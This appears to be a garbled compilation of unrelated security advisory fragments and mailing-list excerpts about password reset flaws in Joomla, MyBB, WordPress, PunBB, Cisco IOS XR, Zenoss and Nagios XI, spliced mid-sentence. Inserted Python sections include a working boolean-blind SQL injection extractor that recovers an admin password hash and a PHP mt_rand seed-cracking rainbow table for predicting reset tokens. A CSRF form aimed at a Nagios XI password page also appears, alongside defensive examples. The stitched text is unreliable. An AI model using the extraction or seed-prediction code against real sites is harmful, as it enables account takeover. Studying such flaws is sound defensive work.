www.sektioneins.de
-= Security Advisory =-
Advisory: Joomla Weak Random Password Reset Token Vulnerability
Release Date: 2008/09/11
Last Modified: 2008/09/11
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Joomla <= 1.5.7
Advisory: MyBB Password Reset Weak Random Numbers Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
Release Date: 2008/09/12
Last Modified: 2008/09/12
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Wordpress <= 2.6.1
Severity: MySQL column truncation allows resetting the passwords of
wordpress users to random strings. Combined with weaknesses
in PHP's PRNG this allows determining the admin password.
Risk: High
Vendor Status: Vendor has released Wordpress 2.6.2 which fixes this issue
Reference: http://www.sektioneins.de/advisories/SE-2008-05.txt
3. *Vulnerability Description*
ManageEngine ADSelfService Plus [1] is a secure, web-based, end-user
password reset management program. This software helps domain users to
perform self service password reset, self service account unlock and
employee self update of personal details (e.g. telephone numbers, etc)
in Microsoft Windows Active Directory. Administrators find it easy to
automate password resets and account unlocks while managing and
optimizing the expenses associated with helpdesk calls.
Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
is only about 32768 possible filenames, so a simple brute force can
reveal the valid path to an uploaded file.
###############################################################################
7. Admin Password Reset Vulnerability
###############################################################################
Reason: use of the "rand()" function, which has known weaknesses (on
Windows its output is limited to 15 bits, i.e. 32768 distinct values)
Preconditions:
1. Windows platform
OS to guarantee certain behaviours. The problem here is that there is
a mechanism which causes a guarantee to be violated.
> > Also, other signals which could be triggered by the predecessor (e.g.
> > SIGALRM triggered due to alarm() followed by exec()) can normally be
> > prevented by specific means (e.g. resetting any outstanding timers).
> > This bug means that such steps are insufficient.
> >
> > A consequence of this bug is that no signal can be trusted.
>
> Sure.
no matter how. A well-written program must not depend on anything that is out of
its control.
> Also, other signals which could be triggered by the predecessor (e.g.
> SIGALRM triggered due to alarm() followed by exec()) can normally be
> prevented by specific means (e.g. resetting any outstanding timers).
> This bug means that such steps are insufficient.
>
> A consequence of this bug is that no signal can be trusted.
>
Sure.
Attached is a Metasploit module I coded to reset the admin password on a 2Wire wireless router. Enjoy.
==============================================================================================
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      'Name'    => '2Wire Password Reset',
      'Version' => '$Revision: 1 $'
      # the remainder of the module is not present on this page
    )
  end
end
Administrators can determine the status of their device by using the
Serial Number Validator located at the following link:
http://serialnumbervalidation.com/PSIRT-20111026
The Serial Number Validator tool will indicate if the device was
affected when the product was shipped. If a factory reset or software
upgrade occurred or certain manual configuration changes were made,
the device may not be affected.
Products Confirmed Not Vulnerable
+--------------------------------
> many, many, many other ways.
All of these are known, documented behaviours. The signals involved
can be blocked or ignored, and the mechanisms which send those signals
can be disabled (tcsetattr() can disable Ctrl-C etc, unused
descriptors can be closed, timers can be reset, etc).
Setuid programs will normally take such steps at startup if they have
critical sections which should avoid being interrupted (e.g. to
prevent stale lock files).
goals are to be faster, smaller and less graphically intensive as
compared to other discussion boards. PunBB has fewer features
than many other discussion boards, but is generally faster and
outputs smaller, semantically correct XHTML-compliant pages."
PunBB comes with a password reset feature that allows resetting a
forgotten password. When a password reset is requested an email
is sent to the user containing a new random password and an
activation link that needs to be visited in order for the password
change to become effective.
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to read and write the file system and to execute
arbitrary commands on the operating system without authentication.
Attackers with valid accounts are able to reset the root password,
add or delete log profiles, view and manipulate admin settings, etc.
It must be noted that further vulnerabilities are to be expected
within the software (such as buffer overflows). Due to lack of time,
no further vulnerabilities were searched for.
only be generated by kill()) can only be received as a result of an
action by a sufficiently privileged process.
Also, other signals which could be triggered by the predecessor (e.g.
SIGALRM triggered due to alarm() followed by exec()) can normally be
prevented by specific means (e.g. resetting any outstanding timers).
This bug means that such steps are insufficient.
A consequence of this bug is that no signal can be trusted.
Also, if it's possible to set the signal to one which cannot be
controller and the TV panel become slow and then completely
inactive), it just doesn't accept inputs
- after other 5 seconds the TV restarts automatically
- this situation will continue forever
During these continuous reboots it is not even possible to reset the
device (for example, holding the "EXIT" button for 15 seconds does not
work in this state) or to perform the other operations normally allowed
to users without voiding the warranty.
This is not a simple temporary denial of service, the TV is just
match request arg length gt 15
!
!
policy-map type inspect http layer7-policymap
class type inspect http layer7-classmap
reset
log
policy-map type inspect layer4-policymap
class type inspect layer4-classmap
inspect
service-policy http layer7-policymap
Summary
It is possible for a non admin user to gain admin privileges on
bytehoard 2.1, by overwriting a session variable if the php option
"register_globals" is enabled. This variable can be overwritten by
abusing the "register user" or the "password reset" module.
Impact
A non-admin user can gain admin privileges, access other accounts and
perform operations under nonexistent accounts.
Protocol (BGP) feature. The vulnerability manifests itself when a BGP
peer announces a prefix with a specific, valid but unrecognized
transitive attribute. On receipt of this prefix, the Cisco IOS XR
device will corrupt the attribute before sending it to the
neighboring devices. Neighboring devices that receive this corrupted
update may reset the BGP peering session.
Affected devices running Cisco IOS XR Software corrupt the
unrecognized attribute before sending to neighboring devices, but
neighboring devices may be running operating systems other than Cisco
IOS XR Software and may still reset the BGP peering session after
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET
====================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01
that allows you to set a new password even if the password was
previously set.
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.
A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.
The timing for the data channels traversing the switch is provided by
the control cards.
+-------------------------------------------------------------------+
Workarounds
===========
Administrators are advised to reset both the admin and root passwords
with the following commands:
Reset Root User Password:
rootsettings on <password>
#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
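The exploit header above only names the injection point: the POST parameter resetpwemail of the password reset form. As an added example (not the exploit from the page and not AlumniServer's code), the following Python models that situation offline: an assumed reset handler that concatenates the e-mail address into its SQL (SQLite stands in for the real database), whose only observable is whether a reset mail would be sent, and an attacker that turns that single bit into the admin password hash with a binary search per character. The table and column names, the sample rows and the fixed handler are all assumptions made for the example.

```python
import sqlite3


def make_app_db():
    """Constructed sample data standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin@example.org", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "alice", "alice@example.org", "e99a18c4ff8d0a8eb0e9cf3c56dc3e44"),
    ])
    return db


def reset_request_vulnerable(db, resetpwemail):
    """Assumed vulnerable handler: the e-mail is concatenated into the query.
    Returns True when a reset mail would be sent (some row matched)."""
    sql = "SELECT id FROM users WHERE email = '" + resetpwemail + "'"
    return db.execute(sql).fetchone() is not None


def reset_request_fixed(db, resetpwemail):
    """Same handler with a parameterised query: the payload is only a string."""
    row = db.execute("SELECT id FROM users WHERE email = ?", (resetpwemail,)).fetchone()
    return row is not None


def length_payload(n):
    """True iff the admin hash has at least n characters. The trailing
    AND '1'='1 absorbs the handler's own closing quote."""
    return ("' OR (SELECT length(password) FROM users WHERE username='admin') >= %d"
            " AND '1'='1" % n)


def char_payload(position, char):
    """True iff the admin hash character at `position` (1-based) is > char."""
    return ("' OR (SELECT substr(password,%d,1) FROM users WHERE username='admin') > '%s"
            % (position, char.replace("'", "''")))


def extract_secret(handler, max_len=64):
    """Boolean blind extraction: one bit per request, binary search per character.
    `handler(payload)` is the only thing the attacker can observe.
    Returns (secret, number_of_requests)."""
    secret, requests = "", 0
    for pos in range(1, max_len + 1):
        requests += 1
        if not handler(length_payload(pos)):
            break                          # past the end of the secret
        lo, hi = 0x20, 0x7E                # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if handler(char_payload(pos, chr(mid))):
                lo = mid + 1               # secret character is above mid
            else:
                hi = mid
        secret += chr(lo)
    return secret, requests


def demo():
    db = make_app_db()
    leaked, n = extract_secret(lambda p: reset_request_vulnerable(db, p))
    blocked, _ = extract_secret(lambda p: reset_request_fixed(db, p))
    return leaked, n, blocked


if __name__ == "__main__":
    leaked, n, blocked = demo()
    print("vulnerable handler leaked %r in %d requests" % (leaked, n))
    print("fixed handler leaked %r" % blocked)
```

Against the parameterised handler every payload is just a non-matching address, so the length probe fails at position 1 and nothing is recovered; against the concatenating one, a 32-character hash costs roughly seven requests per character plus one length probe each.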
- ---------------------------------------------------------------------
Summary
=======
Cisco IOS XR will reset a Border Gateway Protocol (BGP) peering
session when receiving a specific invalid BGP update.
The vulnerability manifests when a BGP peer announces a prefix with a
specific invalid attribute. On receipt of this prefix, the Cisco IOS
XR device will restart the peering session by sending a notification.
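Both IOS XR snippets on this page describe the same trigger: a path attribute that is well-formed but unknown to the receiver. RFC 4271 lets an unrecognized optional transitive attribute pass through unchanged (with the Partial bit set) and has an unrecognized optional non-transitive one silently ignored, so a router that rewrites or rejects such an attribute is what ends up resetting the neighbour's session. As an added example (not Cisco's code), the following Python walks the Path Attributes field of a BGP UPDATE and reports what a receiver that knows only the standard type codes must do with each attribute, including flag combinations the RFC forbids. The set of known types and the sample bytes are constructed for the example.

```python
import struct

# Path attribute flag bits (RFC 4271 section 4.3)
OPTIONAL, TRANSITIVE, PARTIAL, EXT_LEN = 0x80, 0x40, 0x20, 0x10

# type codes this receiver understands (assumed: the base set most stacks know)
KNOWN_TYPES = {
    1: "ORIGIN", 2: "AS_PATH", 3: "NEXT_HOP", 4: "MULTI_EXIT_DISC",
    5: "LOCAL_PREF", 6: "ATOMIC_AGGREGATE", 7: "AGGREGATOR", 8: "COMMUNITY",
}


def parse_path_attributes(data):
    """Yield (flags, type_code, value) for each attribute TLV in `data`.
    Raises ValueError on a truncated attribute."""
    off = 0
    while off < len(data):
        if off + 2 > len(data):
            raise ValueError("truncated attribute header at offset %d" % off)
        flags, code = data[off], data[off + 1]
        off += 2
        if flags & EXT_LEN:                      # two-byte length field
            if off + 2 > len(data):
                raise ValueError("truncated extended length at offset %d" % off)
            length = struct.unpack_from("!H", data, off)[0]
            off += 2
        else:
            if off + 1 > len(data):
                raise ValueError("truncated length at offset %d" % off)
            length = data[off]
            off += 1
        if off + length > len(data):
            raise ValueError("attribute type %d runs past end of data" % code)
        yield flags, code, bytes(data[off:off + length])
        off += length


def classify_attributes(data):
    """Return [(name, disposition)] describing what a receiver that knows only
    KNOWN_TYPES does with each attribute, following RFC 4271 section 6.3."""
    out = []
    for flags, code, _value in parse_path_attributes(data):
        name = KNOWN_TYPES.get(code, "type %d" % code)
        optional = bool(flags & OPTIONAL)
        transitive = bool(flags & TRANSITIVE)
        partial = bool(flags & PARTIAL)
        if not optional and not transitive:
            out.append((name, "ERROR: well-known attribute without Transitive bit"))
        elif not optional and partial:
            out.append((name, "ERROR: Partial bit set on well-known attribute"))
        elif optional and not transitive and partial:
            out.append((name, "ERROR: Partial bit set on non-transitive attribute"))
        elif code in KNOWN_TYPES:
            out.append((name, "recognized"))
        elif not optional:
            out.append((name, "ERROR: unrecognized well-known attribute"))
        elif transitive:
            out.append((name, "unrecognized optional transitive: pass on unchanged, set Partial"))
        else:
            out.append((name, "unrecognized optional non-transitive: ignore"))
    return out


# Constructed sample: ORIGIN IGP, AS_PATH (AS_SEQUENCE of one AS, 65001),
# NEXT_HOP 192.0.2.1, then an unknown optional transitive type 99 with a
# two-byte value. This is the shape of update the advisory describes.
SAMPLE = bytes([
    0x40, 0x01, 0x01, 0x00,
    0x40, 0x02, 0x04, 0x02, 0x01, 0xFD, 0xE9,
    0x40, 0x03, 0x04, 0xC0, 0x00, 0x02, 0x01,
    0xC0, 0x63, 0x02, 0x12, 0x34,
])

if __name__ == "__main__":
    for name, disposition in classify_attributes(SAMPLE):
        print("%-16s %s" % (name, disposition))
```

The last line of the sample output is the interesting one: type 99 must be forwarded byte-for-byte with only the Partial bit added, and a peer that instead corrupts or strips it is the one that should be suspected when downstream sessions reset.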
Description
-----------
pyForum is a 100% Python-based message board system built on the excellent web2py framework.
We have discovered a backdoor in pyForum. Anyone can force a password reset on behalf of other users whose e-mail addresses are known. More importantly, the software author, specifically, can obtain the new administrator's password remotely.
The problem is in the module ``forumhelper.py``. A new password is generated and saved in the database. Then a notification e-mail containing this new password in plaintext is sent to the user. No password reset confirmation code or similar verification step is required. For ordinary users this causes a mild annoyance, or at most an account lockout.
For the Administrator account, however, the problem is more severe. This default account's e-mail address is set to ``administrator@pyforum.org`` and can only be changed directly in the database. The new password is therefore sent to the software author by default, and since this address is known, anyone can request a password reset for it.
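The defect described above is the missing confirmation step: the password is replaced and mailed as soon as anyone submits the address. For contrast, here is an added example (not pyForum's or web2py's code) of the reset flow a practitioner expects, in Python: a request only produces a single-use, expiring confirmation token drawn from the OS CSPRNG; only the token's SHA-256 digest is stored, so a database leak does not hand out usable links; and the password changes only when that token comes back. The ``ResetStore`` class, the 15-minute lifetime and the injectable clock are assumptions made for the example; the demo keeps passwords in plaintext only to make the state visible.

```python
import hashlib
import secrets
import time


class ResetStore:
    """In-memory stand-in for the application's database (assumed)."""

    def __init__(self, lifetime=15 * 60, clock=time.time):
        self.lifetime = lifetime          # seconds a token stays valid
        self.clock = clock                # injectable for testing expiry
        self.pending = {}                 # sha256(token) -> (username, expires_at)
        self.passwords = {}               # username -> password (demo only)

    def add_user(self, username, password):
        self.passwords[username] = password

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def request_reset(self, username):
        """Step 1: someone asked for a reset. Returns the token to embed in the
        e-mail link, or None for an unknown user. Nothing about the account
        changes yet, and the HTTP response must look the same either way so
        the form cannot be used to enumerate accounts."""
        if username not in self.passwords:
            return None
        token = secrets.token_urlsafe(32)      # 256 bits from os.urandom
        self.pending[self._digest(token)] = (username, self.clock() + self.lifetime)
        return token

    def confirm_reset(self, token, new_password):
        """Step 2: the token from the link is presented together with the new
        password. Returns True on success. Looking up the digest rather than
        the token means nothing secret is ever compared byte by byte."""
        now = self.clock()
        for digest, (_, expires_at) in list(self.pending.items()):
            if expires_at <= now:
                del self.pending[digest]           # expired: unusable
        entry = self.pending.pop(self._digest(token), None)   # single use
        if entry is None:
            return False
        username, _ = entry
        self.passwords[username] = new_password
        return True


def demo():
    """Exercise the flow with a fake clock; returns the observable outcomes."""
    clock = [1000.0]
    store = ResetStore(clock=lambda: clock[0])
    store.add_user("admin", "old")
    unknown = store.request_reset("nobody")          # None, account untouched
    token = store.request_reset("admin")
    untouched = store.passwords["admin"]             # still "old" before confirm
    first = store.confirm_reset(token, "new1")       # True
    replay = store.confirm_reset(token, "new2")      # False: token already used
    token2 = store.request_reset("admin")
    clock[0] += 16 * 60                              # 16 minutes later
    expired = store.confirm_reset(token2, "new3")    # False: token expired
    return unknown, untouched, first, replay, expired, store.passwords["admin"]


if __name__ == "__main__":
    print(demo())
```

Compare this with the flow on the page: there, the request itself is the state change, so the e-mail address alone is the credential; here, the request is inert and the unguessable token in the mailbox is what authorises the change.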
It starts where Stefan Esser's wonderful article "mt_srand and not so random numbers" ( http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ ) ended.
I've made some improvements to his idea. Since mt_srand()/mt_rand() are very slow (~17 hours to try all possible 2^32 seeds on my AMD Phenom 2.6 GHz machine) and lookup tables are huge (at least 32 GB), I implemented rainbow tables. With a chain length of 10000 and 512k rows, the table size is 11 MB and an average search takes only about 35 min. Rainbow table parameters can be tuned (longer chains = less space but slower seed cracking; shorter chains and more rows = more space but less time to crack the seed).
Since this is about password reset attacks, the time needed to predict the random string is crucial for the effectiveness of the attack.
I also demonstrate a real PoC against installations of PHP-Nuke and PunBB hosted on the same server with keep-alives enabled. In my example, it took 7 minutes and 4 HTTP requests to reset PunBB's admin password by predicting the "password reset" URL.
I also gave my two cents on how these attacks can be improved even further (e.g. comparing sequences of PRNs instead of just the last values in case we have pseudorandom numbers generated in a smaller interval like mt_rand(1,1000)).
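The PunBB reset mechanism described earlier on this page (a random password plus an activation link, both derived from the PHP PRNG) and the rainbow-table write-up above come down to one operation: given a single value produced by mt_rand() right after mt_srand(seed), recover seed. The following is an added example written for this page; it is neither Esser's code nor the tool the author above describes. It implements the reference MT19937 seeding and first output (PHP's mt_rand() returns that 32-bit word shifted right by one; PHP before 7.1 used a slightly different twist, so first outputs from those versions differ, but the table construction is identical) and a rainbow table over a deliberately reduced 12-bit seed space so it runs in seconds. SEED_BITS, CHAIN_LEN, ROWS and the reduction function are assumptions; the real 2^32 space is the same code with a much larger table, which is the trade-off the text quantifies.

```python
# MT19937 constants
N, M = 624, 397
MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF


def mt19937_first_u32(seed):
    """First 32-bit word of MT19937 after init_genrand(seed).
    That word is state[0] after the first twist, which depends only on
    state words 0, 1 and 397, so only the first 398 words of the seeding
    recurrence are computed (the main cost saving for a table build)."""
    mt = [seed & 0xFFFFFFFF]
    for i in range(1, M + 1):
        prev = mt[-1]
        mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
    y = (mt[0] & UPPER) | (mt[1] & LOWER)
    word = mt[M] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
    word ^= word >> 11                       # tempering
    word ^= (word << 7) & 0x9D2C5680
    word ^= (word << 15) & 0xEFC60000
    word ^= word >> 18
    return word & 0xFFFFFFFF


def php_mt_rand_first(seed):
    """mt_srand(seed); mt_rand() on PHP >= 7.1: the reference output >> 1."""
    return mt19937_first_u32(seed) >> 1


# Rainbow table parameters (assumed, shrunk so the demo runs in seconds)
SEED_BITS = 12
SEED_SPACE = 1 << SEED_BITS
CHAIN_LEN = 16
ROWS = 256


def reduce_to_seed(value, step):
    """Reduction function: maps an mt_rand() value back into seed space.
    Mixing in the step index is what makes this a rainbow table: chains
    that collide at different steps do not merge."""
    return (value + step) % SEED_SPACE


def build_table(rows=ROWS, chain_len=CHAIN_LEN):
    """Return {chain endpoint: [chain start seeds]}."""
    table = {}
    stride = SEED_SPACE // rows
    for r in range(rows):
        start = r * stride
        x = start
        for step in range(chain_len):
            x = reduce_to_seed(php_mt_rand_first(x), step)
        table.setdefault(x, []).append(start)
    return table


def lookup_seed(table, observed, chain_len=CHAIN_LEN):
    """Recover a seed s with php_mt_rand_first(s) == observed, or None if the
    table does not cover it (coverage is probabilistic)."""
    for pos in range(chain_len - 1, -1, -1):
        # assume `observed` was produced at chain position `pos` and finish
        # that chain to see which endpoint it would reach
        x = reduce_to_seed(observed, pos)
        for step in range(pos + 1, chain_len):
            x = reduce_to_seed(php_mt_rand_first(x), step)
        for start in table.get(x, ()):
            s = start                         # re-walk the candidate chain
            for step in range(chain_len):
                v = php_mt_rand_first(s)
                if v == observed:
                    return s
                s = reduce_to_seed(v, step)
    return None


def chain_seed(start, position, chain_len=CHAIN_LEN):
    """Seed sitting at `position` of the chain that begins at `start`."""
    s = start
    for step in range(position):
        s = reduce_to_seed(php_mt_rand_first(s), step)
    return s


if __name__ == "__main__":
    table = build_table()
    leaked = php_mt_rand_first(2718)          # e.g. the value behind a reset link
    print("recovered seed:", lookup_seed(table, leaked))
```

Space and time behave as the text says: ROWS * CHAIN_LEN evaluations build the table, ROWS entries are stored, and a lookup costs about CHAIN_LEN^2 / 2 evaluations, so doubling CHAIN_LEN halves the table and quadruples the search.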
of the applications functionality is accessible via a front end web application.
II. DETAILS
Multiple CSRF vulnerabilities exist that can allow for arbitrary
commands to be executed on the Zenoss server as well as reset the Zenoss
admin password.
Attack scenario: if an administrator has an active Zenoss
session and visits one of these links, or visits a malicious page that
contains resources pointing to these URLs,
>
I disagree with you in that. Any hard guarantee can be given only by God.
I repeat, signals are in general not a reliable information source since they
can be generated in a couple of ways, even by an unkind superuser :-) .
> > In fact, PDEATHSIG should be reset for every binary, not just suid/sgid, since
> > it emits signal that exec()ed program may not expect.
>
> Are you talking about the parent exec()ing or the child?
>
No matter.
> access at all times of that Asus netbook it's arguably more secure in
> some circumstances.
Not just XP Home. I can confirm that this "vulnerability" is a standard feature
of several OEM and MS released versions of both XP Home and XP Professional.
In both cases I've had to manually reset the password to something.
This seems to be a "feature" - since if you have to use the recovery console
it'll ask you for the password for "Administrator"... by default it's blank
and you can just hit enter.
that themselves.
Technical Details
Reset the nagiosadmin password via CSRF
This can be useful to hijack the administrators account.
<input type='button' id='adminpassword' value='Set nagiosadmin Password'/>
<form name="adminpasswordform"
action="http://10.0.10.28/nagiosxi/account/main.php?page=acctinfo"